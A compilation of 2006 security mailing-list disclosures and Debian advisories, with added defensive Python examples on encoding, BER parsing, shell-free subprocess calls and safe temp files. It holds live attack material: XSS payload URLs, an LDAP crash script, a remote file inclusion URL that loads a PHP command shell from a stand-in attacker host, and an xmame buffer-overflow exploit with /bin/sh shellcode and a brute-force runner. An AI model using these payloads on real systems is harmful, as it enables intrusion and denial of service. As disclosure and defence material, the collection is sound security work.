BrowserCRM vulnerable for XSS
Inputs in BrowserCRM are not properly sanitized, and XSS is possible in a lot of the system's input fields and URL parameters. Some fields have been filtered in a basic form, so that simple scripting like <script>alert('XSS')</script> is not possible. However, since the filtering is not based on white listing you can conduct successful XSS attacks with code like <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>.

PoC: http://www.SITE.example/modules/Search/results.php?query=%3CIMG+SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E

Vendor's site: http://www.browsercrm.com/

Please credit to: Preben Nyløkken
Cerberus Helpdesk vulnerable to XSS
Inputs in Cerberus Helpdesk are not properly sanitized, and XSS is possible in a lot of the system's input fields and URL parameters. You can add XSS that will hit every user of the system, and even simple scripting tags like <script>alert(f)</script> are allowed.

PoC: http://www.SITE.example/tts2/clients.php?mode=search&sid=sidvalue&contact_search=<script>alert('c')</script>

Vendor's site: http://www.webgroupmedia.com

Please credit to: Preben Nyløkken
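Both reports above make the same point: a deny-list filter that removes <script> leaves every other way of starting a tag untouched, while encoding the value for the context it is written into closes all of them at once. The following Python is an added example (not code from either report, nor from BrowserCRM or Cerberus Helpdesk) that runs the two payloads quoted above through a deny-list filter, through HTML output encoding and through an allow-list validator; the filter, the allow-list policy and the starts_a_tag check are constructed for this illustration.

```python
import html
import re

# Constructed payloads modelled on the two reports above: the plain <script>
# form that a basic filter catches, and the <IMG SRC=javascript:...> form
# with the text assembled by String.fromCharCode, which such a filter misses.
SCRIPT_PAYLOAD = "<script>alert('XSS')</script>"
IMG_PAYLOAD = "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>"


def reflect_with_denylist(value: str) -> str:
    """Deny-list 'sanitiser' (hypothetical): removes <script> tags and nothing
    else. Anything it has not been taught about passes through untouched."""
    return re.sub(r"(?i)</?script[^>]*>", "", value)


def reflect_with_encoding(value: str) -> str:
    """Output encoding for an HTML text-node context: every character the HTML
    parser treats specially becomes an entity, so no tag can start."""
    return html.escape(value, quote=True)


def validate_query(value: str):
    """Allow-list input validation for a search field (hypothetical policy):
    accept letters, digits, whitespace and a few punctuation marks, return
    None for anything else. This complements output encoding; it does not
    replace it."""
    return value if re.fullmatch(r"[\w\s.,@-]{0,200}", value) else None


def starts_a_tag(fragment: str) -> bool:
    """Coarse check used only to compare the approaches: can a tag begin in
    this fragment once the browser parses it?"""
    return re.search(r"<\s*/?[A-Za-z]", fragment) is not None


def compare(payload: str) -> dict:
    """Apply all three treatments to one input and report what survives."""
    filtered = reflect_with_denylist(payload)
    encoded = reflect_with_encoding(payload)
    return {
        "denylist_output": filtered,
        "denylist_neutralised": not starts_a_tag(filtered),
        "encoded_output": encoded,
        "encoded_neutralised": not starts_a_tag(encoded),
        "accepted_by_allowlist": validate_query(payload) is not None,
    }


if __name__ == "__main__":
    for p in (SCRIPT_PAYLOAD, IMG_PAYLOAD, "winamp playlist"):
        print(p, "->", compare(p))
```

The deny-list neutralises the first payload and passes the second through verbatim; encoding neutralises both because no `<` survives, and the allow-list rejects both before they reach the page at all.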
Re: Re: Winamp 5.12 - 0day exploit - code execution through playlist
Nullsoft has released a fixed version 5.13 now. Internet Storm Center shared the information last night at http://isc.sans.org/diary.php?storyid=1080

An official download link is http://www.winamp.com/player/

- Juha-Matti

You can disable auto-launching Winamp for playlist files as a workaround. For Firefox, go to Tools / Options settings, click on the Download icon, then click on View & Edit Actions... Scroll down to the M3U extension and then push the Remove Action button. Firefox will no longer automatically launch firefox for Winamp playlist files.

It is a good idea in general for attack surface reduction to trim down the View & Edit actions to just the ones you need. Do you really need AIFF and AU auto-launching, for instance? What about all those Quicktime and Acrobat formats? Looks like a lot of unnecessary attack surface to me.

For IE you need to disable the file type in Windows Explorer. Go to Tools / Folder Options / File Types. Scroll down to the file extension you want to change. In this case it's M3U. Check "Confirm after download". You will be prompted to launch WinAmp if an M3U file is downloaded. You can remove the file type completely, but that will also remove the ability to double-click to launch playlists from the Windows shell. You may want to go through this list and check "Confirm after download" for many file types. It would be nice if more vendors installed their file types with this option in place.

-Chris
Re: EasyCMS vulnerable to XSS injection.
Kind of you to notice. Our system will during the next week be patched for XSS flaws in the different input fields which might be of concern for XSS. The rest of the system will also be checked to re-ensure that all user input is processed securely. We take this matter seriously, and would like to inform that you are referring to the input fields of the contact form, which outputs a receipt with the given data which was not checked for XSS, since we don't use cookies in Easy CMS. I will update this post when we have more news on this upcoming security update.

regards,
Kim Steinhaug
Easy CMS developer
Proof of concept for CommuniGate Pro Server vulnerability
Hi all,

The simple code below can be used to reproduce one of the CommuniGate 5.0.6 LDAP vulnerabilities (http://www.gleg.net/cg_advisory.txt)

#!/usr/bin/env python
# Use this code at your own risk.
# It may crash your server!
# Author: Evgeny Legerov

import sys
import socket

HELP = """
CommuniGate Pro 5.0.6 vulnerability.
Found with ProtoVer LDAP testsuite v1.1

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1389495376 (LWP 20235)]
0xada99bbc in memcpy () from /lib/libc.so.6
(gdb) backtrace
#0  0xada99bbc in memcpy () from /lib/libc.so.6
#1  0x083924b8 in STCopyCString ()
#2  0x08349d5b in BERPackedData::makeCString ()
#3  0x081ae71a in VLDAPInput::processBINDrequest ()
#4  0x081af747 in VLDAPInput::processInput ()
#5  0x082c9373 in VStream::worker ()
#6  0x082ca1e9 in VStream::starter ()
#7  0x08399e7d in STThreadStarter ()
#8  0xadb8bb80 in start_thread () from /lib/libpthread.so.0
#9  0xadaf8dee in clone () from /lib/libc.so.6
(gdb) x/i $eip
0xada99bbc <memcpy+28>:  repz movsl %ds:(%esi),%es:(%edi)
(gdb) info regi esi edi ecx
esi            0x8688961        141068641
edi            0x86c6fff        141324287
ecx            0x3fff7eae       1073708718
"""

print(HELP)

host = "localhost"
port = 389

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))

# LDAPMessage { messageID 1, BindRequest { version 3, name "DN", simple } }
# where the final element carries a long-form length of 0xffffffff
s = b"\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
s += b"\x84\xff\xff\xff\xff"

sock.sendall(s)
sock.close()

1+1=2

Best regards,
Evgeny Legerov
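The backtrace above ends in memcpy() under BERPackedData::makeCString() after a BIND request whose last element announces a long-form length of 0xffffffff, so the defect is a declared BER length being trusted before it is compared with the bytes actually received. The Python below is an added example, not part of the post and not CommuniGate code: a minimal BER parser for the LDAP BindRequest layout that makes exactly that comparison and therefore rejects the PoC bytes, alongside an encoder for a well-formed request to show the same layout parsing cleanly. The 1 MiB element limit and the fixed BindRequest field order it accepts are assumptions made for the illustration.

```python
# Byte string copied from the PoC above: an LDAP BindRequest whose last element
# announces a long-form length of 0xffffffff (bytes 84 ff ff ff ff) with nothing
# behind it.
POC_BIND = (b"\x30\x12\x02\x01\x01\x60\x0d\x02\x01\x03\x04\x02\x44\x4e\x80"
            b"\x84\xff\xff\xff\xff")

MAX_ELEMENT = 1 << 20  # constructed policy: no single element larger than 1 MiB


class BerError(ValueError):
    """Raised for any structurally invalid BER element."""


def read_length(buf: bytes, pos: int):
    """Decode the BER length starting at buf[pos]; return (length, next_pos)."""
    if pos >= len(buf):
        raise BerError("truncated: no length byte")
    first = buf[pos]
    pos += 1
    if first < 0x80:                     # short form
        return first, pos
    if first == 0x80:                    # indefinite form is not allowed in LDAP
        raise BerError("indefinite length not permitted")
    nbytes = first & 0x7F                # long form: this many length bytes follow
    if nbytes > 4:
        raise BerError("length field too wide")
    if pos + nbytes > len(buf):
        raise BerError("truncated length field")
    return int.from_bytes(buf[pos:pos + nbytes], "big"), pos + nbytes


def read_tlv(buf: bytes, pos: int):
    """Return (tag, content, next_pos) for the element at buf[pos]."""
    if pos >= len(buf):
        raise BerError("truncated: no tag byte")
    tag = buf[pos]
    length, pos = read_length(buf, pos + 1)
    # The comparison the crashing code path evidently lacks: the declared
    # length must never exceed the bytes actually present.
    if length > len(buf) - pos:
        raise BerError(f"element claims {length} bytes, only {len(buf) - pos} remain")
    if length > MAX_ELEMENT:
        raise BerError("element exceeds size policy")
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(msg: bytes) -> dict:
    """Parse LDAPMessage { messageID, BindRequest { version, name, simple } }."""
    tag, body, end = read_tlv(msg, 0)
    if tag != 0x30 or end != len(msg):
        raise BerError("outer SEQUENCE malformed or trailing bytes")
    tag, mid, pos = read_tlv(body, 0)
    if tag != 0x02:
        raise BerError("messageID must be INTEGER")
    tag, bind, pos = read_tlv(body, pos)
    if tag != 0x60 or pos != len(body):
        raise BerError("expected a single BindRequest [APPLICATION 0]")
    t1, version, p = read_tlv(bind, 0)
    t2, name, p = read_tlv(bind, p)
    t3, simple, p = read_tlv(bind, p)           # [0] simple credentials
    if (t1, t2, t3) != (0x02, 0x04, 0x80) or p != len(bind):
        raise BerError("unexpected BindRequest layout")
    return {"message_id": int.from_bytes(mid, "big"),
            "version": int.from_bytes(version, "big"),
            "name": name.decode("utf-8"),
            "password_len": len(simple)}


def is_well_formed(msg: bytes) -> bool:
    """True if the message parses; False for any BER or text-decoding error."""
    try:
        parse_bind_request(msg)
        return True
    except ValueError:      # BerError and UnicodeDecodeError both derive from it
        return False


def tlv(tag: int, content: bytes) -> bytes:
    """Encode one BER element (definite length, minimal long form when needed)."""
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + content


def build_bind_request(message_id: int, name: str, password: str) -> bytes:
    """Well-formed simple bind; message_id must fit in one byte here."""
    bind = tlv(0x02, bytes([3])) + tlv(0x04, name.encode()) + tlv(0x80, password.encode())
    return tlv(0x30, tlv(0x02, bytes([message_id])) + tlv(0x60, bind))


if __name__ == "__main__":
    print("PoC bytes accepted:", is_well_formed(POC_BIND))
    print(parse_bind_request(build_bind_request(1, "cn=admin,dc=example,dc=com", "s3cret")))
```

The PoC fails at the innermost element: the length field decodes to 4294967295 while zero bytes remain, and the parser refuses before any copy is attempted.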
[SECURITY] [DSA 957-2] New ImageMagick packages fix arbitrary command execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 957-2                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
January 31st, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : imagemagick
Vulnerability  : missing shell meta sanitising
Problem type   : local (remote)
Debian-specific: no
CVE ID         : CVE-2005-4601
BugTraq ID     : 16093
Debian Bug     : 345238

Florian Weimer discovered that delegate code in ImageMagick is vulnerable to shell command injection using specially crafted file names. This allows attackers to encode commands inside of graphic commands. With some user interaction, this is exploitable through Gnus and Thunderbird. This update filters out the '$' character as well, which was forgotten in the former update.

For the old stable distribution (woody) this problem has been fixed in version 5.4.4.5-1woody8.

For the stable distribution (sarge) this problem has been fixed in version 6.0.6.2-2.6.

For the unstable distribution (sid) this problem has been fixed in version 6.2.4.5-0.6.

We recommend that you upgrade your imagemagick packages.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8.dsc
      Size/MD5 checksum:      852 fc5fe3786f18e31776c5109149beac1d
    http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8.diff.gz
      Size/MD5 checksum:    17314 476cdfed2f44b7408ddad37f4c3324cb
    http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5.orig.tar.gz
      Size/MD5 checksum:  3901237 f35e356b4ac1ebc58e3cffa7ea7abc07

  Alpha architecture:

    http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8_alpha.deb
      Size/MD5 checksum:  1310122 6e7cc62b742c715da4f71d218ae1dbae
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5_5.4.4.5-1woody8_alpha.deb
      Size/MD5 checksum:   154410 ec18833c61573cbb75495706283abbb5
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5-dev_5.4.4.5-1woody8_alpha.deb
      Size/MD5 checksum:    56628 ed24011751c90a526ffad462fc9440a0
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick5_5.4.4.5-1woody8_alpha.deb
      Size/MD5 checksum:   833808 85d1c0728ec664f0743ddd354e771613
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick5-dev_5.4.4.5-1woody8_alpha.deb
      Size/MD5 checksum:    67624 a10f44b82341a743cf0dce936b036791
    http://security.debian.org/pool/updates/main/i/imagemagick/perlmagick_5.4.4.5-1woody8_alpha.deb
      Size/MD5 checksum:   114122 96be3fb4dc0feb9ac580ba008f825479

  ARM architecture:

    http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8_arm.deb
      Size/MD5 checksum:  1297412 3660aafabc9853cc02a84d121c28d218
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5_5.4.4.5-1woody8_arm.deb
      Size/MD5 checksum:   119112 06af700adbbcae6e0016a66e16699be3
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5-dev_5.4.4.5-1woody8_arm.deb
      Size/MD5 checksum:    56668 3e41f0ce3936ba06f82893592a299620
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick5_5.4.4.5-1woody8_arm.deb
      Size/MD5 checksum:   899276 1e765ee6069a3c600ab85cd834811a6b
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick5-dev_5.4.4.5-1woody8_arm.deb
      Size/MD5 checksum:    67654 79eec2c54b674de34462f2a03981d487
    http://security.debian.org/pool/updates/main/i/imagemagick/perlmagick_5.4.4.5-1woody8_arm.deb
      Size/MD5 checksum:   110240 081b7a943d53aca6fa73f7e55c65e04b

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/i/imagemagick/imagemagick_5.4.4.5-1woody8_i386.deb
      Size/MD5 checksum:  1295102 56fda4def88fee79d55a25408d1367f4
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5_5.4.4.5-1woody8_i386.deb
      Size/MD5 checksum:   123052 c6a678056c89d1d209bd2229508db7ad
    http://security.debian.org/pool/updates/main/i/imagemagick/libmagick++5-dev_5.4.4.5-1woody8_i386.deb
      Size/MD5 checksum:    56622
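The advisory's fix is to add one more character to a deny-list of shell metacharacters, which is exactly why a second update was needed: a deny-list is only as complete as the last character someone remembered. The Python below is an added example (not ImageMagick or Debian code) contrasting file names filtered and then spliced into a command string for a shell with the approach that removes the shell from the path entirely, plus shlex.quote for the case where a shell cannot be avoided. The delegate template, the "converter" tool name and both deny-lists are constructed for the illustration.

```python
import shlex
import subprocess
import sys

# Constructed delegate template in the spirit of a delegates.xml entry
# (%i = input file, %o = output file); "converter" is a hypothetical tool.
DELEGATE_TEMPLATE = "converter -o %o %i"

# Constructed deny-lists: the first resembles a filter that forgot '$',
# the second adds it, as the DSA 957-2 update does.
METAS_WITHOUT_DOLLAR = set("`|;&<>\"'\\()")
METAS_WITH_DOLLAR = METAS_WITHOUT_DOLLAR | {"$"}


def strip_metas(name: str, metas: set) -> str:
    """Deny-list filter: drop every character found in the list."""
    return "".join(c for c in name if c not in metas)


def shell_command(template: str, infile: str, outfile: str, metas: set) -> str:
    """The fragile pattern: filter the names, then build ONE string that will be
    handed to /bin/sh -c. Whatever the filter misses, the shell interprets."""
    return (template.replace("%i", strip_metas(infile, metas))
                    .replace("%o", strip_metas(outfile, metas)))


def delegate_argv(template: str, infile: str, outfile: str) -> list:
    """The robust pattern: split the template once, substitute placeholders
    inside individual argv elements, and never involve a shell. The file name
    stays a single argument whatever characters it contains."""
    return [tok.replace("%i", infile).replace("%o", outfile)
            for tok in shlex.split(template)]


def child_sees(argument: str) -> str:
    """Start a child with the argument passed as a list element (no shell) and
    return what the child actually received. The current Python interpreter
    stands in for the delegate program so nothing else needs to be installed."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; sys.stdout.write(sys.argv[1])", argument],
        capture_output=True, text=True, check=True)
    return proc.stdout


def quoted_for_shell(argument: str) -> str:
    """If a shell truly cannot be avoided, quote each argument as a whole
    instead of trying to enumerate the characters to remove."""
    return shlex.quote(argument)


if __name__ == "__main__":
    crafted = "photo$HOME.jpg"   # constructed file name containing a metacharacter
    print(shell_command(DELEGATE_TEMPLATE, crafted, "out.png", METAS_WITHOUT_DOLLAR))
    print(shell_command(DELEGATE_TEMPLATE, crafted, "out.png", METAS_WITH_DOLLAR))
    print(delegate_argv(DELEGATE_TEMPLATE, crafted, "out.png"))
    print(child_sees(crafted))
    print(quoted_for_shell(crafted))
```

With the older deny-list the `$` reaches the command string intact and the shell would expand it; with argv lists the same name reaches the child byte-for-byte as data, and no list of forbidden characters has to be maintained at all.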
FarsiNews 2.1 PHP Remote File Inclusion
Remote File Inclusion in FarsiNews 2.1 and below

Credit: The information has been provided by Hamid Ebadi (Hamid Network Security Team): [EMAIL PROTECTED]
The original article can be found at: http://hamid.ir/security

Vulnerable Systems:
FarsiNews 2.1 Beta 2 and below

Vulnerable Code:
The following lines in loginout.php:

  require_once($cutepath."/inc/functions.inc.php");
  require_once($cutepath."/data/config.php");

Exploits:
If register_globals=ON has been set (check PHP.INI) we can use the URL below to make the script include an external file. The following URL will cause the server to include external files (phpshell.txt):

  http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt?

phpshell.txt
---
<?
system ($_GET['cmd']);
die ("<h3>http://Hamid.ir Hamid Ebadi (Hamid Network Security Team)</h3>");
?>
-[EOF]

Workaround:
Use FarsiNews 2.5 or, for an unofficial patch, simply add the following line as the second line of loginout.php:

  if (isset($_REQUEST["cutepath"])){ die("Patched by Hamid Ebadi -- http://hamid.ir (Hamid Network Security Team)"); }
Nmap 4.00 Released
Bugtraqers,

Insecure.Org is pleased to announce the immediate, free availability of the Nmap Security Scanner version 4.00 from http://www.insecure.org/nmap/ .

I try not to burden the Bugtraq list with more than one Nmap announcement per year. So I encourage those of you who would like to hear about new Nmap releases as they happen to join the low-volume nmap-hackers list at http://cgi.insecure.org/mailman/listinfo/nmap-hackers .

I just did an interview for SecurityFocus which provides some further details on this release: http://www.securityfocus.com/columnists/384

CHANGES:

Nmap has undergone many substantial changes since our last major release (3.50 in February 2004) and we recommend that all current users upgrade. Here are the most important improvements made in the 36 intermediate releases since 3.50:

o Added the ability for Nmap to send and properly route raw ethernet frames containing IP datagrams rather than always sending the packets via raw sockets. This is particularly useful for Windows, since Microsoft has disabled raw socket support in XP. Nmap tries to choose the best method at runtime based on platform, though you can override it with the new --send-eth and --send-ip options.

o Added ARP scanning (-PR). Nmap can now send raw ethernet ARP requests to determine whether hosts on a LAN are up, rather than relying on higher-level IP packets (which can only be sent after a successful ARP request and reply anyway). This is much faster and more reliable (not subject to IP-level firewalling) than IP-based probes. It is now used automatically for any hosts that are detected to be on a local ethernet network, unless --send-ip was specified.

o Added the --spoof-mac option, which asks Nmap to use the given MAC address for all of the raw ethernet frames it sends. Valid --spoof-mac argument examples are Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco.

o Rewrote core port scanning engine, which is now named ultra_scan(). Improved algorithms make this faster (often dramatically so) in almost all cases. Not only is it superior against single hosts, but ultra_scan() can scan many hosts (sometimes hundreds) in parallel. This offers many efficiency/speed advantages. For example, hosts often limit the ICMP port unreachable packets used by UDP scans to 1/second. That made those scans extraordinarily slow in previous versions of Nmap. But if you are scanning 100 hosts at once, suddenly you can receive 100 responses per second. Spreading the scan amongst hosts is also gentler toward the target hosts.

o Overhauled UDP scan. Ports that don't respond are now classified as open|filtered (open or filtered) rather than open. The (somewhat rare) ports that actually respond with a UDP packet to the empty probe are considered open. If version detection is requested, it will be performed on open|filtered ports. Any that respond to any of the UDP probes will have their status changed to open. This avoids the false-positive problem where filtered UDP ports appear to be open, leading to terrified newbies thinking their machine is infected by back orifice.

o Put Nmap on a diet, with changes to the core port scanning routine (ultra_scan) to substantially reduce memory consumption, particularly when tens of thousands of ports are scanned.

o Added 'leet ASCII art to the configurator! Note that only people compiling the UNIX source code get this. (ASCII artist unknown). If you don't like it, feel free to submit your own work.

o Wrote a new man page from scratch. It is much more comprehensive (more than twice as long) and (IMHO) better organized than the previous one. Read it online at http://www.insecure.org/nmap/man/ or docs/nmap.1 from the Nmap distribution. Let me know if you have any ideas for improving it. Translations to Chinese, French, Japanese, Brazilian Portuguese, Portugal Portuguese, and Romanian can be found on the Nmap docs page at http://www.insecure.org/nmap/docs.html . More than a dozen other translations are in progress. The XML source for the man page is distributed with Nmap in docs/nmap-man.xml. Patches to Nmap that are user-visible should include patches to the man page XML source rather than to the generated Nroff.

o Integrated all service submissions up to January 2006. The DB has tripled in size since 3.50 to 3,153 signatures for 381 service protocols. Those protocols span the gamut from abc, acap, afp, and afs to zebedee, zebra, and zenimaging. It even covers obscure protocols such as http, ftp, smtp, and ssh :). Thanks to Version Detection Czar Doug Hoyte for his excellent work on this. Other great probes and signatures came from Dirk Mueller (mueller(a)kde.org), Lionel Cons (lionel.cons(a)cern.ch), Martin Macok (martin.macok(a)underground.cz), and Bo Jiang (jiangbo(a)brandeis.edu). Thanks also go to the (literally) thousands of you who
Xmame 0.102 local vulnerability proof-of-concept
The following proof-of-concept demonstrates the existence of the local vulnerability found in xmame 0.102. It uses the brute-force technique. The RET address interval works on Intel Debian GNU/Linux. To test for the vulnerability, run gcc exploit.c -o exploit and then perl fb.pl.

exploit.c:

#define NOP 0x90
#define TAMBUF 1200
#define INIC_SH 400

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main (int argc, char **argv)
{
  static char shellcode[] =
    "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
    "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x58";
  char buffer [TAMBUF + 1];
  char cadena [TAMBUF + 3];
  int cont;
  /* candidate return address passed in hex by fb.pl */
  unsigned long ret = strtoul (argv[1], NULL, 16);

  /* fill the whole buffer with the candidate address */
  for (cont = 0; cont < TAMBUF / 4; cont++)
    *( (long *) buffer + cont) = ret;

  /* place the shellcode after the NOP sled */
  for (cont = 0; cont < strlen (shellcode); cont++)
    buffer [cont + INIC_SH] = shellcode [cont];

  /* NOP sled at the start */
  for (cont = 0; cont < INIC_SH; cont++)
    buffer [cont] = NOP;

  buffer [TAMBUF] = 0;
  printf ("RET = 0x%x\n", ret);

  strcpy (cadena, "AA");
  strcat (cadena, buffer);
  execl ("./xmame.x11", "./xmame.x11", "-pb", cadena, (char *) 0);
}

fb.pl:

#!/usr/bin/perl
# try return addresses upwards from 0xbfffe000, four bytes at a time
$cnt = 0xbfffe000;
while (1) {
  $hex = sprintf ("0x%x", $cnt);
  $res = system ("./exploit $hex");
  printf "$hex : $res\n";
  $cnt += 4;
}

Greetings,

Rafael San Miguel Carrasco
Security Consultant
www.rafaelsanmiguel.com
[SECURITY] [DSA 960-2] New libmail-audit-perl packages fix insecure temporary file use
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 960-2                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
January 31st, 2006                      http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : libmail-audit-perl
Vulnerability  : insecure temporary file creation
Problem type   : local
Debian-specific: no
CVE ID         : CVE-2005-4536
Debian Bug     : 344029

This update only corrects the update for sarge, the version in woody is correct.

Niko Tyni discovered that the Mail::Audit module, a Perl library for creating simple mail filters, logs to a temporary file with a predictable filename in an insecure fashion when logging is turned on, which is not the case by default.

For the old stable distribution (woody) these problems have been fixed in version 2.0-4woody1.

For the stable distribution (sarge) these problems have been fixed in version 2.1-5sarge2.

For the unstable distribution (sid) these problems have been fixed in version 2.1-5.1.

We recommend that you upgrade your libmail-audit-perl package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail-audit-perl_2.1-5sarge2.dsc
      Size/MD5 checksum:      786 00abe0533af4fb16e3f65a5dda9ded34
    http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail-audit-perl_2.1-5sarge2.diff.gz
      Size/MD5 checksum:     4266 4348a85b636a87503374874354eefdcd
    http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail-audit-perl_2.1.orig.tar.gz
      Size/MD5 checksum:    21669 b52b1142fa9ed7d847c531186f913ea6

  Architecture independent components:

    http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/libmail-audit-perl_2.1-5sarge2_all.deb
      Size/MD5 checksum:    41874 136f752ab91f2ce393f1c943d151c0e3
    http://security.debian.org/pool/updates/main/libm/libmail-audit-perl/mail-audit-tools_2.1-5sarge2_all.deb
      Size/MD5 checksum:        1 d3caeeef4e88540511c1fdb3ae3f8877

  These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFD39KyW5ql+IAeqTIRAlxMAJ9MTW2uVg36G+PBmXu/LmxqaxlACwCgrF+6
P4Nx1XWnEpv3cu/Y7sI1HWs=
=wjbv
-----END PGP SIGNATURE-----
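The defect class in DSA 960-2 is a log file whose name any local user can predict and therefore pre-create or pre-link before the privileged process opens it. The Python below is an added example, not Mail::Audit's code, showing three ways of opening such a log: at a predictable name with plain append, at the same name with O_EXCL and O_NOFOLLOW so anything already present is refused, and with tempfile.mkstemp so the name is unguessable and created with mode 0600. The file-name pattern and the planted pre-existing file are constructed for the illustration, and everything happens in a private scratch directory rather than /tmp.

```python
import os
import shutil
import stat
import tempfile


def predictable_log_path(directory: str, uid: int) -> str:
    """Constructed stand-in for a log file whose name depends only on the
    user id, so any local user can compute it in advance."""
    return os.path.join(directory, f"mail-audit-{uid}.log")


def open_log_naively(path: str):
    """Opens whatever is at the predictable name: follows symlinks and
    appends to a file someone else may already have created."""
    return open(path, "a")


def open_log_safely(path: str):
    """Same fixed name, but refuse anything that already exists there
    (O_EXCL) or a symlink (O_NOFOLLOW), and create it owner-only."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_APPEND
    flags |= getattr(os, "O_NOFOLLOW", 0)      # not available on every platform
    fd = os.open(path, flags, 0o600)
    return os.fdopen(fd, "a")


def open_log_unpredictably(directory: str):
    """Preferred option: mkstemp picks an unguessable name, opens it with
    O_EXCL semantics and mode 0600. Returns (file object, path)."""
    fd, path = tempfile.mkstemp(prefix="mail-audit-", suffix=".log", dir=directory)
    return os.fdopen(fd, "a"), path


def demo(uid: int = 1000) -> dict:
    """Simulate the predictable name being occupied before the logger runs,
    then compare the three openers. Uses a private scratch directory."""
    scratch = tempfile.mkdtemp()
    try:
        path = predictable_log_path(scratch, uid)
        with open(path, "w") as planted:            # constructed pre-existing file
            planted.write("planted\n")

        with open_log_naively(path) as log:          # happily appends to it
            log.write("log line\n")
        with open(path) as f:
            naive_appended = f.read() == "planted\nlog line\n"

        try:
            open_log_safely(path).close()
            safe_refused = False
        except FileExistsError:
            safe_refused = True

        with open_log_safely(path + ".fresh") as log:   # works when nothing is there
            log.write("log line\n")
        fresh_mode = stat.S_IMODE(os.stat(path + ".fresh").st_mode)

        log, rand_path = open_log_unpredictably(scratch)
        log.write("log line\n")
        log.close()
        rand_mode = stat.S_IMODE(os.stat(rand_path).st_mode)

        return {"naive_appended_to_planted_file": naive_appended,
                "safe_open_refused_existing": safe_refused,
                "safe_open_fresh_mode_0600": fresh_mode == 0o600,
                "random_name_differs": rand_path != path,
                "random_file_mode_0600": rand_mode == 0o600}
    finally:
        shutil.rmtree(scratch, ignore_errors=True)


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The naive opener writes into the planted file without noticing; the O_EXCL opener fails closed on the occupied name and only succeeds on a fresh one; mkstemp sidesteps the race entirely by never reusing a name an outsider could have guessed.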
Windows Access Control Demystified
Hello everybody,

We have constructed a logical model of Windows XP access control, in a declarative but executable (Datalog) format. We have built a scanner that reads access-control configuration information from the Windows registry, file system, and service control manager database, and feeds raw configuration data to the model. Therefore we can reason about such things as the existence of privilege-escalation attacks, and indeed we have found several user-to-administrator vulnerabilities caused by misconfigurations of the access-control lists of commercial software from several major vendors. We propose tools such as ours as a vehicle for software developers and system administrators to model and debug the complex interactions of access control on installations under Windows.

The full version of the paper can be found at: http://www.cs.princeton.edu/~sudhakar/papers/winval.pdf

All the vendors and CERT are aware of this paper. The bugs are *not* remotely exploitable. The CERT id is VU#953860.

regards,
Sudhakar Govindavajhala and Andrew Appel.

Bio:

Sudhakar Govindavajhala is a finishing PhD student at the Computer Science department, Princeton University. His interests are computer security, operating systems and networks. Sudhakar is looking for employment opportunities.

